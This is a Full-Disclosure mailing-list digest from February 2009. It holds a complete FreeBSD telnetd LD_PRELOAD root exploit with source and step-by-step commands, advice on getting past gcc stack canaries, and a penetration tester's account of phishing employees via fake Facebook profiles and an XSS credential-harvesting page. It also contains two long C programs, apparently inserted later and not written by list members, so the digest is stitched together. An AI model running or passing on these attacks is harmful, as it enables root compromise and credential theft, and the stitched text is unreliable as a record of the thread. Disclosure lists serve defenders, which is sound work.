[Full-disclosure] ICQ 6 protocol bug?

2009-02-13 Thread Darren Reed
For some time now I've seen ICQ receive messages, from unknown people,
occasionally make the client core dump. The messages are often
gibberish - more like the ASCII characters from someone trying to make
it execute something it shouldn't.

My interpretation of this is unknown parties are trying to exploit a bug
in ICQ6 (it may work on Win2k or Win98...) but I might be wrong. I need
to fire up wireshark to see what actually gets sent.

Has anyone else seen this?
Or have details on what the hack is?

Google found some hits for old bugs, older than ICQ6

Darren
-- 
  Darren Reed
  darr...@reed.wattle.id.au

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] cryptsetup can't destroy last key of a LUKS partition under Ubuntu/Debian

2009-02-13 Thread Pierre Dinh-van
Hello everyone,

I noticed last week that the Debian packaged version of cryptsetup has a
little limitation, which could be a security issue for people who have to
destroy their data forever. 

It is impossible to destroy a keyslot when you used it to unlock the master
key.

I reported the bug to debian (etch and lenny are affected as far as I tested):
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=513596
and to ubuntu (tested on hardy):
https://bugs.launchpad.net/cryptsetup/+bug/324871

It's not a major security problem, but people who were planning to run 
'cryptsetup luksDelKey /dev/sda1 0' on their installation when the police 
come to wake them up should be advised that it won't work out of the box.

Cheers,


Pierre Dinh-van



Re: [Full-disclosure] Facebook from a hackers perspective

2009-02-13 Thread Rafael Torrales Levaggi
Great history, excellent method.
Thanks!

-----Original Message-----
From: listbou...@securityfocus.com [mailto:listbou...@securityfocus.com]
On behalf of Adriel T. Desautels
Sent: Thursday, 12 February 2009 13:24
To: pen-test list
CC: Untitled
Subject: Facebook from a hackers perspective

For those interested, here is our latest blog entry.

For the past few years we've (Netragard) been using internet based  
Social Networking tools to hack into our customer's IT  
Infrastructures. This method of attack has been used by hackers since  
the conception of Social Networking Websites, but only recently has it  
caught the attention of the media. As a result of this new exposure  
we've decided to give people a rare glimpse into Facebook from a  
hacker's perspective.

Let's start off by talking about the internet and identity. The  
internet is a shapeless world where identities are not only dynamic  
but can't ever be verified with certainty. As a result, it's easily  
possible to be one person one moment, then another person the next  
moment. This is particularly true when using internet based social  
networking sites like Facebook (and the rest).

Humans have a natural tendency to trust each other. If one human being  
can provide another human with something sufficient then trust is  
earned. That something sufficient can be a face to face meeting but  
it doesn't always need to be. Roughly 90% of the people that we've  
targeted and successfully exploited during our social attacks trusted  
us because they thought we worked for the same company as them.

The setup...

Facebook allows its users to search for other users by keyword. Many  
facebook users include their place of employment in their profile.  
Some companies even have facebook groups that only employees or  
contractors are allowed to become members of. So step one is to  
perform reconnaissance against those facebook using employees. This  
can be done with facebook, or with reconnaissance tools like Maltego  
and pipl.com.

Reconnaissance is the military term for the collection of intelligence  
about an enemy prior to attacking the enemy. With regards to hacking,  
reconnaissance can be performed against social targets (facebook,  
myspace, etc) and technology targets (servers, firewalls, routers,  
etc). Because our preferred method of attacking employees through  
facebook is via phishing we normally perform reconnaissance against  
both vectors.

When setting up for the ideal attack two things are nice to have but  
only one is required. The first is the discovery of some sort of Cross- 
site Scripting vulnerability (or something else useful) in our  
customers website (or one of their servers). The vulnerability is the  
component that is not required, but is a nice to have (we can set up  
our own fake server if we need to). The second component is the  
required component, and that is the discovery of facebook profiles for  
employees that work for our customer (other social networking sites  
work just as well).

In one of our recent engagements we performed detailed social and  
technical reconnaissance. The social reconnaissance enabled us to  
identify 1402 employees 906 of which used facebook. We didn't read all  
906 profiles but we did read around 200 which gave us sufficient  
information to create a fake employee profile. The technical  
reconnaissance identified various vulnerabilities one of which was the  
Cross-site Scripting vulnerability that we usually hope to find. In  
this case the vulnerability existed in our customer's corporate website.

Cross-site scripting (XSS) is a kind of computer security  
vulnerability that is most frequently discovered in websites that do  
not have sufficient input validation or data validation capabilities.  
XSS vulnerabilities allow an attacker to inject code into a website  
that is viewed by other users. This injection can be done server side  
by saving the injected code on the server (in a forum, blog, etc) or  
it can be done client side by injecting the code into a specially  
crafted URL that can be delivered to a victim.

During our recent engagement we used a client side attack as opposed  
to a server side attack. We chose the client side attack because it  
enabled us to select only the users that we are interested in  
attacking. Server side attacks are not as surgical and usually affect  
any user who views the compromised server page.

The payload that we created was designed to render a legitimate  
looking https secured web page that appeared to be a component of our  
customer's web site. When a victim clicks on the specially crafted  
link the payload is executed and the fake web page is rendered. In  
this case our fake web page was an alert that warned users that their  
accounts may have been compromised and that they should verify their  
credentials by entering them into the form provided. When the user's  
credentials are entered the form submitted 

Re: [Full-disclosure] Facebook from a hackers perspective

2009-02-13 Thread Michael Painter
- Original Message - 
From: Adriel T. Desautels 
Sent: Thursday, February 12, 2009 6:23 AM
Subject: Facebook from a hackers perspective


 Lets start off by talking about the internet and identity. The  
 internet is a shapeless world where identities are not only dynamic  
 but can't ever be verified with certainty. As a result, its easily  
 possible to be one person one moment, then another person the next  
 moment. This is particularly true when using internet based social  
 networking sites like Facebook (and the rest).

http://www.unc.edu/depts/jomc/academics/dri/idog.html




Re: [Full-disclosure] Facebook from a hackers perspective

2009-02-13 Thread Adriel T. Desautels
That is awesome!  I am going to add that to the blog post :)


On Feb 13, 2009, at 5:41 AM, Michael Painter wrote:

 - Original Message -
 From: Adriel T. Desautels
 Sent: Thursday, February 12, 2009 6:23 AM
 Subject: Facebook from a hackers perspective


 Lets start off by talking about the internet and identity. The
 internet is a shapeless world where identities are not only dynamic
 but can't ever be verified with certainty. As a result, its easily
 possible to be one person one moment, then another person the next
 moment. This is particularly true when using internet based social
 networking sites like Facebook (and the rest).

 http://www.unc.edu/depts/jomc/academics/dri/idog.html





Adriel T. Desautels
ad_li...@netragard.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com



Re: [Full-disclosure] Facebook from a hackers perspective

2009-02-13 Thread Smoking Gun
 On Fri, Feb 13, 2009 at 10:12 AM, bobby.mug...@hushmail.com wrote:



 Your transgender technical attack was pioneered and perfected in
 2008 by information security expert Eric Loki Hines - why are you
 taking credit for a lesser version of his groundbreaking work, and
 insisting on originality?



Perhaps he's experienced in transgendered psychology maybe even a
transgender himself. Not that there is anything wrong with that. Why are you
coming down on him for plagiarizing? Everyone in the security industry with
more posts to mailing lists than actual experience conducting real world
security work (momand-pop.com's don't count!) is concretely an expert at
talking the talk. So why get on his case for using sed? 's:that work:is
mines now:g'. Don't be such a troll.


-- 
Making no mistakes is what establishes the certainty of victory, for it
means conquering an enemy that is already defeated. - Sun Tzu

Re: [Full-disclosure] Facebook from a hackers perspective

2009-02-13 Thread Adriel T. Desautels

Sounds to me like you have a crush on Eric Loki Hines.



On Feb 13, 2009, at 10:12 AM, bobby.mug...@hushmail.com wrote:


 Dear ATD,

 Because most of the targeted employees were male between the ages
 of 20 and 40 we decided that it would be best to become a very
 attractive 28 year old female.

 Your transgender technical attack was pioneered and perfected in
 2008 by information security expert Eric Loki Hines - why are you
 taking credit for a lesser version of his groundbreaking work, and
 insisting on originality?

 1. Eric Loki Hines is a security expert and presents at BlackHat
   http://www.blackhat.com/html/win-usa-01/win-usa-01-
 speakers.html#Loki
 2. Eric Loki Hines updates his linkedin profile
   http://www.linkedin.com/in/alissaknight
 3. Alissa Knight starts softcore pornography site
   http://www.alissaknight.com
 4. Snosoft claims to have invented social engineering.

 Please give credit where credit is due.

 I await your response with masterfully baited breath.

 - -bm


 On Fri, 13 Feb 2009 09:45:42 -0500 Adriel T. Desautels
 ad_li...@netragard.com wrote:
 That is awesome!  I am going to add that to the blog post :)


 On Feb 13, 2009, at 5:41 AM, Michael Painter wrote:

 - Original Message -
 From: Adriel T. Desautels
 Sent: Thursday, February 12, 2009 6:23 AM
 Subject: Facebook from a hackers perspective


 Lets start off by talking about the internet and identity. The
 internet is a shapeless world where identities are not only
 dynamic
 but can't ever be verified with certainty. As a result, its
 easily
 possible to be one person one moment, then another person the
 next
 moment. This is particularly true when using internet based
 social
 networking sites like Facebook (and the rest).

 http://www.unc.edu/depts/jomc/academics/dri/idog.html





  Adriel T. Desautels
  ad_li...@netragard.com
--

  Subscribe to our blog
http://snosoft.blogspot.com





Adriel T. Desautels
ad_li...@netragard.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com



Re: [Full-disclosure] Facebook from a hackers perspective

2009-02-13 Thread bobby . mugabe

Attentive Dialtone,

Are you suggesting there is something wrong with my feelings for
her?

- -bm

On Fri, 13 Feb 2009 11:28:22 -0500 Adriel T. Desautels
ad_li...@netragard.com wrote:
Sounds to me like you have a crush on Eric Loki Hines.





[Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-13 Thread Jason Starks
I came across a problem that I am sure many security researchers have seen
before:

ja...@uboo:~$ cat bof.c
#include <stdio.h>
#include <string.h>

int main()
{

char buf[512];

memset(buf, 'A', 528);

return 0;

}
ja...@uboo:~$

ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f08500]
./bof[0x8048467]
[0x41414141]
=== Memory map: 
08048000-08049000 r-xp  08:01 5630493/home/jason/bof
08049000-0804a000 r--p  08:01 5630493/home/jason/bof
0804a000-0804b000 rw-p 1000 08:01 5630493/home/jason/bof
09407000-09428000 rw-p 09407000 00:00 0  [heap]
b7dfe000-b7e0b000 r-xp  08:01 2696597/lib/libgcc_s.so.1
b7e0b000-b7e0c000 r--p c000 08:01 2696597/lib/libgcc_s.so.1
b7e0c000-b7e0d000 rw-p d000 08:01 2696597/lib/libgcc_s.so.1
b7e0d000-b7e0e000 rw-p b7e0d000 00:00 0
b7e0e000-b7f66000 r-xp  08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f66000-b7f68000 r--p 00158000 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f68000-b7f69000 rw-p 0015a000 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f69000-b7f6c000 rw-p b7f69000 00:00 0
b7f83000-b7f85000 rw-p b7f83000 00:00 0
b7f85000-b7f9f000 r-xp  08:01 2696604/lib/ld-2.8.90.so
b7f9f000-b7fa r-xp b7f9f000 00:00 0  [vdso]
b7fa-b7fa1000 r--p 0001a000 08:01 2696604/lib/ld-2.8.90.so
b7fa1000-b7fa2000 rw-p 0001b000 08:01 2696604/lib/ld-2.8.90.so
bfb8c000-bfba1000 rw-p bffeb000 00:00 0  [stack]
Aborted
ja...@uboo:~$

I have googled my brains out for a solution, but all I have gathered is that
my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to get
this. There seems to be some people on this list who may know something on
how to exploit on *nix systems with this protection enabled.

I do not want to just disable the protection and exploit it normally, I want
to learn how to exploit it this way.

Jason

[Full-disclosure] 1234567890 today

2009-02-13 Thread the.soylent
hi..
according to http://en.wikipedia.org/wiki/Unixtime unixtime will have
today the 'magic' number 1234567890
gratulations --- and who know where the party is? :)

/soylent

btw: sry 4 non-sec-posting... i know the list has enough to carry with
that --- but... i know there are many geeks out there who wanna make a
screenshot of that ;)









Re: [Full-disclosure] 1234567890 today

2009-02-13 Thread sr.
that just means it's the end of the world...

On Fri, Feb 13, 2009 at 12:25 PM, the.soylent the.soyl...@gmail.com wrote:
 hi..
 according to http://en.wikipedia.org/wiki/Unixtime unixtime will have
 today the 'magic' number 1234567890
 gratulations --- and who know where the party is? :)

 /soylent

 btw: sry 4 non-sec-posting... i know the list has enough to carry with
 that --- but... i know there are many geeks out there who wanna make a
 screenshot of that ;)









Re: [Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-13 Thread Valdis . Kletnieks
On Fri, 13 Feb 2009 11:50:11 EST, Jason Starks said:

 memset(buf, 'A', 528);

Don't do that.  This sort of whoops is exactly what the gcc SSP canary is
designed to stop.

 I have googled my brains out for a solution, but all I have gathered is that
 my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
 return address it also overwrites the canary's value, and triggers a stop in
 the program. I've disassembled it and anybody who can help me probably
 doesn't need me to explain much more, but I would like to know a way to get
 this. There seems to be some people on this list who may know something on
 how to exploit on *nix systems with this protection enabled.

What you want to do is be more precise in your splatting.  Instead of
one memset, see if you can come up with a way to do *two* memsets, which
leave your stack looking like:

  'A' (above the canary)
  4 unmolested bytes of canary
  'A' (below the canary)

Of course, if you're trying to exploit already-existing code, you probably
only have one memset/strcpy you can abuse, and the starting address of the
destination is already nailed down, which means you need to fill in the
4 bytes of canary correctly.  This means you need to find a way to obtain
the value so you can use it.  One hint - sometimes you're better off targeting
the stack frame 2 or 3 function calls back, rather than the *current* frame.



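A byte-level model of the picture Valdis draws, added here as an example for this thread (it is not code from the thread, and not glibc's or gcc's own implementation): the i386 frame that -fstack-protector produces for a function like Jason's bof.c, laid out as [buf 512][canary 4][saved ebp 4][return address 4], with the epilogue comparison applied to three write patterns. The frame offsets, the canary and return-address values, the saved-ebp value and all function names are constructed for this example; the only facts taken from the thread are the 512-byte buffer, the 528-byte memset and the 0x41414141 frame that appears in Jason's backtrace.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Constructed model of the i386 frame -fstack-protector emits. */
#define BUF_SIZE    512
#define CANARY_OFF  BUF_SIZE            /* canary sits right above buf   */
#define EBP_OFF     (CANARY_OFF + 4)    /* saved frame pointer           */
#define RET_OFF     (EBP_OFF + 4)       /* saved return address          */
#define FRAME_SIZE  (RET_OFF + 4)

struct frame {
    unsigned char mem[FRAME_SIZE];
    uint32_t canary_ref;  /* value the prologue copied from TLS; the epilogue compares against it */
    uint32_t ret_ref;     /* return address as it stood on function entry */
};

enum outcome { CLEAN = 0, DETECTED = 1, UNDETECTED = 2 };

static void put_le32(unsigned char *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

static uint32_t get_le32(const unsigned char *p)
{
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

static void frame_init(struct frame *f, uint32_t canary, uint32_t ret)
{
    memset(f->mem, 0, sizeof f->mem);
    put_le32(f->mem + CANARY_OFF, canary);
    put_le32(f->mem + EBP_OFF, 0xbfb8ff00u);   /* constructed saved ebp */
    put_le32(f->mem + RET_OFF, ret);
    f->canary_ref = canary;
    f->ret_ref = ret;
}

/* Model of memset(buf + offset, fill, len): the write runs upward through the
 * canary, saved ebp and return address; bytes past the frame are dropped.
 * Returns the number of bytes that landed inside the frame. */
static size_t frame_memset(struct frame *f, size_t offset, int fill, size_t len)
{
    if (offset >= FRAME_SIZE)
        return 0;
    if (len > FRAME_SIZE - offset)
        len = FRAME_SIZE - offset;
    memset(f->mem + offset, fill, len);
    return len;
}

/* The epilogue: compare the canary; the model then also inspects the return slot. */
static enum outcome frame_epilogue(const struct frame *f)
{
    if (get_le32(f->mem + CANARY_OFF) != f->canary_ref)
        return DETECTED;     /* __stack_chk_fail: "*** stack smashing detected ***" */
    if (get_le32(f->mem + RET_OFF) != f->ret_ref)
        return UNDETECTED;   /* check passes, yet ret would leave the function elsewhere */
    return CLEAN;
}

#define CANARY 0x7a3f9c00u  /* constructed; glibc keeps the low byte zero on i386 */
#define RET    0x080484b2u  /* constructed address inside the binary's text segment */

/* Jason's bof.c: memset(buf, 'A', 528) from the start of buf. */
static enum outcome scenario_memset_528(void)
{
    struct frame f;
    frame_init(&f, CANARY, RET);
    frame_memset(&f, 0, 'A', 528);
    return frame_epilogue(&f);
}

/* What the return slot holds after that write: the 0x41414141 in Jason's backtrace. */
static uint32_t ret_after_memset_528(void)
{
    struct frame f;
    frame_init(&f, CANARY, RET);
    frame_memset(&f, 0, 'A', 528);
    return get_le32(f.mem + RET_OFF);
}

/* A write that stays inside buf. */
static enum outcome scenario_in_bounds(void)
{
    struct frame f;
    frame_init(&f, CANARY, RET);
    frame_memset(&f, 0, 'A', BUF_SIZE);
    return frame_epilogue(&f);
}

/* Valdis's picture: 'A' below the canary, the canary untouched, 'A' above it. */
static enum outcome scenario_two_writes(void)
{
    struct frame f;
    frame_init(&f, CANARY, RET);
    frame_memset(&f, 0, 'A', BUF_SIZE);
    frame_memset(&f, EBP_OFF, 'A', 8);
    return frame_epilogue(&f);
}

static const char *verdict(enum outcome o)
{
    return o == CLEAN ? "clean" : o == DETECTED ? "detected by canary" : "NOT detected";
}

int main(void)
{
    printf("memset 528 : %s (ret slot = 0x%08x)\n", verdict(scenario_memset_528()), ret_after_memset_528());
    printf("memset 512 : %s\n", verdict(scenario_in_bounds()));
    printf("two writes : %s\n", verdict(scenario_two_writes()));
    return 0;
}
```

The verdicts are the point: a contiguous write from buf cannot reach the return address without passing through the canary, which is exactly what the abort on Jason's box shows; a write that stays inside buf is invisible to the check, and so is a write that starts above the canary. The canary therefore detects a class of bugs rather than guaranteeing the return address, which is why it ships alongside ASLR, non-executable stacks and FORTIFY_SOURCE rather than instead of them.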

Re: [Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-13 Thread ArcSighter Elite

valdis.kletni...@vt.edu wrote:
 On Fri, 13 Feb 2009 11:50:11 EST, Jason Starks said:
 
 memset(buf, 'A', 528);
 
 Don't do that.  This sort of whoops is exactly what the gcc SSP canary is
 designed to stop.
 
 I have googled my brains out for a solution, but all I have gathered is that
 my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
 return address it also overwrites the canary's value, and triggers a stop in
 the program. I've disassembled it and anybody who can help me probably
 doesn't need me to explain much more, but I would like to know a way to get
 this. There seems to be some people on this list who may know something on
 how to exploit on *nix systems with this protection enabled.
 
 What you want to do is be more precise in your splatting.  Instead of
 one memset, see if you can come up with a way to do *two* memsets, which
 leave your stack looking like:
 
   'A' (above the canary)
   4 unmolested bytes of canary
   'A' (below the canary)
 
 Of course, if you're trying to exploit already-existing code, you probably
 only have one memset/strcpy you can abuse, and the starting address of the
 destination is already nailed down, which means you need to fill in the
 4 bytes of canary correctly.  This means you need to find a way to obtain
 the value so you can use it.  One hint - sometimes you're better off targeting
 the stack frame 2 or 3 function calls back, rather than the *current* frame.
 
 
 
 
 

He was actually seeking ways to bypass stack protection in gcc
environments. There may be references on the web; reducing the entropy
for prediction, brute-forcing or abusing signal handlers could be a
good starting point. I have little experience with gcc, ask Matt Miller.


[Full-disclosure] [SECURITY] [DSA 1724-1] New moodle packages fix several vulnerabilities

2009-02-13 Thread Martin Schulze

------------------------------------------------------------------------
Debian Security Advisory DSA 1724-1                   secur...@debian.org
http://www.debian.org/security/                            Steffen Joeris
February 13th, 2009                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: moodle
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2009-0500 CVE-2009-0502 CVE-2008-5153
Debian Bug : 514284

Several vulnerabilities have been discovered in Moodle, an online
course management system.  The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-0500

It was discovered that the information stored in the log tables
was not properly sanitized, which could allow attackers to inject
arbitrary web code.

CVE-2009-0502

It was discovered that certain input via the Login as function
was not properly sanitised leading to the injection of arbitrary
web script.

CVE-2008-5153

Dmitry E. Oboukhov discovered that the SpellCheker plugin creates
temporary files insecurely, allowing a denial of service attack.
Since the plugin was unused, it is removed in this update.

For the stable distribution (etch) these problems have been fixed in
version 1.6.3-2+etch2.

For the testing (lenny) distribution these problems have been fixed in
version 1.8.2.dfsg-3+lenny1.

For the unstable (sid) distribution these problems have been fixed in
version 1.8.2.dfsg-4.

We recommend that you upgrade your moodle package.


Upgrade Instructions
--------------------

wget <url>
will fetch the file for you
dpkg -i <file.deb>
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

  Source archives:


http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch2.dsc
  Size/MD5 checksum:  793 b86fd980d09fc1f54744962d765a17d7

http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch2.diff.gz
  Size/MD5 checksum:25398 60b9bf677040fbd71e7951deaa8b91d7

http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3.orig.tar.gz
  Size/MD5 checksum:  7465709 2f9f3fcf83ab0f18c409f3a48e07eae2

  Architecture independent components:


http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch2_all.deb
  Size/MD5 checksum:  6582298 7a90893e954672f33e129aa4d7ca5aa3


  These files will probably be moved into the stable distribution on
  its next update.

------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>



Re: [Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-13 Thread Marcus Meissner
On Fri, Feb 13, 2009 at 11:50:11AM -0500, Jason Starks wrote:
 I came across a problem that I am sure many security researchers have seen
 before:
 
 ja...@uboo:~$ cat bof.c
 #include <stdio.h>
 #include <string.h>
 
 int main()
 {
 
 char buf[512];
 
 memset(buf, 'A', 528);
 
 return 0;
 
 }
 ja...@uboo:~$
 
 ja...@uboo:~$ ./bof
 *** stack smashing detected ***: ./bof terminated
 === Backtrace: =
 /lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
 ja...@uboo:~$
 
 I have googled my brains out for a solution, but all I have gathered is that
 my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
 return address it also overwrites the canary's value, and triggers a stop in
 the program. I've disassembled it and anybody who can help me probably
 doesn't need me to explain much more, but I would like to know a way to get
 this. There seems to be some people on this list who may know something on
 how to exploit on *nix systems with this protection enabled.
 
 I do not want to just disable the protection and exploit it normally, I want

Perhaps you should learn first exactly _what_ caught your buffer overflow.

Hint: It was not SSP aka -fstack-protector.

Ciao, Marcus



[Full-disclosure] FreeBSD zeroday

2009-02-13 Thread Kingcope Kingcope
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
and possible remote root code execution.

There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when executing /bin/login,
which leads to a (possible) remote root hole.

The telnet protocol allows passing environment variables inside the
telnet traffic and assigning them on the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victim's box and includes malicious code is possible.
When /bin/login is executed with user id and group id 0 ('root') it preloads
the library that was set by the remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely, but it is not impossible.
An attacker could e.g. upload a malicious library using ftp (including anonymous
ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be an ftp server running beside
the telnet daemon, also serving anonymous users with write access. Then the
attacker would upload the malicious library and define the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.

Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-

Then we compile this stuff.

---snip-
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-

Then we copy the file to a known location (local root exploit)

---snip-
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-
#telnet
auth disable SRA
environ define LD_PRELOAD /tmp/libno_ex.so.1.0
open target
---snip-
ALEX-ALEX
#ROOTSHELL

This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other versions of FreeBSD may also be affected;
OpenBSD and NetBSD were not tested but MAY contain the same bug for
historic reasons.

Signed,
Kingcope[nikolaos rangos]/2009

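The check the post says telnetd lacked, written up as an added example for this thread (it is not Kingcope's code and not FreeBSD's telnetd): a parser for the body of a telnet NEW-ENVIRON suboption, the option behind the client's "environ define", followed by the deny-list a daemon must apply before any client-supplied variable reaches a root-owned /bin/login. The suboption codes are RFC 1572's; the struct layout, the deny-list entries beyond the LD_ prefix, the sample bytes and every function name are this example's own assumptions, and the post's /tmp/libno_ex.so.1.0 path is reused as the sample value.

```c
#include <stdio.h>
#include <string.h>

/* Suboption codes from RFC 1572 (NEW-ENVIRON, telnet option 39). */
#define ENV_IS      0
#define ENV_INFO    2
#define ENV_VAR     0
#define ENV_VALUE   1
#define ENV_ESC     2
#define ENV_USERVAR 3
#define MAX_VARS 16
#define MAX_LEN  64

struct envvar { char name[MAX_LEN]; char value[MAX_LEN]; int uservar; /* 1 if sent as USERVAR */ };

/* Parse the bytes between "IAC SB NEW-ENVIRON" and "IAC SE" (IAC doubling
 * already undone by the telnet layer). Returns the number of variables
 * stored in out[], or -1 if the data is malformed or does not fit. */
static int parse_new_environ(const unsigned char *p, size_t len, struct envvar *out, int max)
{
    int n = -1, in_value = 0;   /* n: index of the variable being filled */
    size_t pos = 0;

    if (len == 0 || (p[0] != ENV_IS && p[0] != ENV_INFO)) return -1;
    for (size_t i = 1; i < len; i++) {
        unsigned char c = p[i];
        if (c == ENV_VAR || c == ENV_USERVAR) {          /* start of a new variable */
            if (++n >= max) return -1;
            memset(&out[n], 0, sizeof out[n]);
            out[n].uservar = (c == ENV_USERVAR);
            in_value = 0; pos = 0;
        } else if (c == ENV_VALUE) {                       /* switch from name to value */
            if (n < 0 || in_value) return -1;
            in_value = 1; pos = 0;
        } else {                                           /* data byte, possibly ESC-quoted */
            if (n < 0) return -1;
            if (c == ENV_ESC) { if (++i >= len) return -1; c = p[i]; }
            if (pos + 1 >= MAX_LEN) return -1;             /* keep room for the terminator */
            (in_value ? out[n].value : out[n].name)[pos++] = (char)c;
        }
    }
    return n + 1;
}

/* Variables a daemon that execs /bin/login as root must never forward. The
 * LD_ prefix is the case in the post; the named entries are this example's
 * own additions (dynamic-loader and shell start-up controls). */
static int env_is_dangerous(const char *name)
{
    static const char *const blocked[] = { "IFS", "PATH", "ENV", "BASH_ENV", "SHELL", "LIBPATH", "SHLIB_PATH", NULL };
    if (name[0] == '\0' || strchr(name, '=')) return 1;   /* empty, or would split into two entries */
    if (strncmp(name, "LD_", 3) == 0) return 1;
    for (size_t k = 0; blocked[k]; k++)
        if (strcmp(name, blocked[k]) == 0) return 1;
    return 0;
}

/* Copy the variables that may be passed on; returns how many were kept. */
static int filter_environ(const struct envvar *in, int n, struct envvar *out, int max)
{
    int kept = 0;
    for (int i = 0; i < n && kept < max; i++)
        if (!env_is_dangerous(in[i].name)) out[kept++] = in[i];
    return kept;
}

/* Constructed sample: DISPLAY as one of RFC 1572's well-known VARs, plus the
 * LD_PRELOAD from the post's "environ define", which is not a well-known name
 * and so travels as USERVAR. */
static const unsigned char sample[] = {
    ENV_IS,
    ENV_VAR, 'D','I','S','P','L','A','Y', ENV_VALUE, ':','0',
    ENV_USERVAR, 'L','D','_','P','R','E','L','O','A','D',
    ENV_VALUE, '/','t','m','p','/','l','i','b','n','o','_','e','x','.','s','o','.','1','.','0'
};

/* Parse and filter the sample; returns how many variables would reach /bin/login. */
static int sample_forwarded(struct envvar *kept, int max)
{
    struct envvar parsed[MAX_VARS];
    int n = parse_new_environ(sample, sizeof sample, parsed, MAX_VARS);
    return n < 0 ? -1 : filter_environ(parsed, n, kept, max);
}

int main(void)
{
    struct envvar parsed[MAX_VARS], kept[MAX_VARS];
    int n = parse_new_environ(sample, sizeof sample, parsed, MAX_VARS);
    for (int i = 0; i < n; i++)
        printf("%-7s %s=%s -> %s\n", parsed[i].uservar ? "USERVAR" : "VAR", parsed[i].name,
               parsed[i].value, env_is_dangerous(parsed[i].name) ? "dropped" : "kept");
    printf("%d variable(s) forwarded to login\n", sample_forwarded(kept, MAX_VARS));
    return 0;
}
```

The filter runs on the daemon side, after parsing and before the environment is handed to the privileged child, so it does not matter whether the client marked the variable VAR or USERVAR or how it escaped the bytes. A deny-list is the minimum; a daemon that only ever needs a handful of names (DISPLAY, TERM, the RFC's well-known set) is better served by an allow-list, which is a one-line change to env_is_dangerous.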